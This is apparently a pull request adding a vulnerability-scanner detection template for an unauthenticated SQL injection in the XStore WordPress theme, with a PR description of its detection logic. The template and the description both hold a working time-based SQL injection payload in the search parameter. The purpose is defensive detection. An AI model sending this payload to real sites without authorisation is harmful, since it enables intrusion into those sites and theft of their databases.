### PR TITLE
feat: add CVE-2026-3326 - XStore Theme < 9.7.3 Unauthenticated SQL Injection

### DIFF
--- a/http/cves/2026/CVE-2026-3326.yaml
+++ b/http/cves/2026/CVE-2026-3326.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-3326
 
 info:
-  name: XStore Theme < 9.7.3 - Unauthenticated SQL Injection via Search Parameter
+  name: XStore Theme < 9.7.3 - SQL Injection
   author: VixianSchool
   severity: high
   description: |
@@ -21,7 +21,7 @@ info:
   metadata:
     max-request: 2
     verified: true
-  tags: cve,cve2026,wordpress,wp,wp-theme,sqli,xstore,time-based-sqli,unauth
+  tags: cve,cve2026,wordpress,wp,wp-theme,sqli,xstore
 
 flow: http(1) && http(2)
 

--- a/http/cves/2026/CVE-2026-3326.yaml
+++ b/http/cves/2026/CVE-2026-3326.yaml
@@ -5,14 +5,9 @@ info:
   author: VixianSchool
   severity: high
   description: |
-    The XStore WordPress theme before version 9.7.3 is vulnerable to unauthenticated
-    SQL injection via the 's' search parameter when 'et_search=true' is present.
-    The parameter is concatenated unsanitised into a SQL query in an AJAX handler
-    registered to the wp_ajax_nopriv_ hook, allowing unauthenticated attackers to
-    read database contents including credentials and customer data.
+    The Xstore WordPress theme before 9.7.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
   impact: |
-    Unauthenticated attackers can extract arbitrary data from the WordPress database,
-    including credentials, session tokens, and WooCommerce customer records.
+    Unauthenticated attackers can extract arbitrary data from the WordPress database, including credentials, session tokens, and WooCommerce customer records.
   remediation: |
     Update XStore theme to version 9.7.3 or later.
   reference:
@@ -35,6 +30,19 @@ http:
     path:
       - "{{BaseURL}}/wp-content/themes/xstore/style.css"
 
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "XStore"
+        internal: true
+
+      - type: dsl
+        dsl:
+          - 'compare_versions(version, "< 9.7.3")'
+        internal: true
+
     extractors:
       - type: regex
         name: version
@@ -44,24 +52,12 @@ http:
           - 'Version:\s*([0-9.]+)'
         internal: true
 
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "XStore"
-
-      - type: dsl
-        dsl:
-          - 'compare_versions(version, "< 9.7.3")'
-
   - raw:
       - |
         @timeout: 20s
         GET /?s=test%27)%20AND%20(SELECT%208039%20FROM%20(SELECT(SLEEP(5)))HQgJ)%20AND%20(%27hyMm%27=%27hyMm&et_search=true&post_type=product HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:

--- a/http/cves/2026/CVE-2026-3326.yaml
+++ b/http/cves/2026/CVE-2026-3326.yaml
@@ -1,0 +1,70 @@
+id: CVE-2026-3326
+
+info:
+  name: XStore Theme < 9.7.3 - Unauthenticated SQL Injection via Search Parameter
+  author: VixianSchool
+  severity: high
+  description: |
+    The XStore WordPress theme before version 9.7.3 is vulnerable to unauthenticated
+    SQL injection via the 's' search parameter when 'et_search=true' is present.
+    The parameter is concatenated unsanitised into a SQL query in an AJAX handler
+    registered to the wp_ajax_nopriv_ hook, allowing unauthenticated attackers to
+    read database contents including credentials and customer data.
+  impact: |
+    Unauthenticated attackers can extract arbitrary data from the WordPress database,
+    including credentials, session tokens, and WooCommerce customer records.
+  remediation: |
+    Update XStore theme to version 9.7.3 or later.
+  reference:
+    - https://wpscan.com/vulnerability/2c5bdb17-8b12-45b5-878b-627056dc8956/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-3326
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2026-3326
+    cwe-id: CWE-89
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2026,wordpress,wp,wp-theme,sqli,xstore,time-based-sqli,unauth
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/themes/xstore/style.css"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - 'Version:\s*([0-9.]+)'
+        internal: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "XStore"
+
+      - type: dsl
+        dsl:
+          - 'compare_versions(version, "< 9.7.3")'
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?s=test%27)%20AND%20(SELECT%208039%20FROM%20(SELECT(SLEEP(5)))HQgJ)%20AND%20(%27hyMm%27=%27hyMm&et_search=true&post_type=product HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration >= 5'
+          - 'status_code != 404'
+        condition: and


### PR DESCRIPTION
## Summary

Adds a detection template for **CVE-2026-3326** — Unauthenticated SQL Injection in the XStore WordPress theme before version 9.7.3, via the `s` search parameter.

## Vulnerability Details

- **Theme**: XStore (`xstore`)
- **Affected**: < 9.7.3 | **Fixed**: 9.7.3
- **CVSS**: 8.6 High — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`
- **CWE**: CWE-89 (SQL Injection)
- **Authenticated**: No — exposed on `/?et_search=true` endpoint
- **Researcher**: Ahmed Makawi

## Detection Logic

**Request 1** — GET `/wp-content/themes/xstore/style.css` to confirm XStore theme is installed and extract version. Only proceeds if version < 9.7.3.

**Request 2** — GET `/?s=test')%20AND%20(SELECT%208039%20FROM%20(SELECT(SLEEP(5)))HQgJ)%20AND%20('hyMm'='hyMm&et_search=true&post_type=product` with `@timeout: 20s`. Matches on `duration >= 5` to confirm time-based SQL injection.

## References

- https://wpscan.com/vulnerability/2c5bdb17-8b12-45b5-878b-627056dc8956/
- https://nvd.nist.gov/vuln/detail/CVE-2026-3326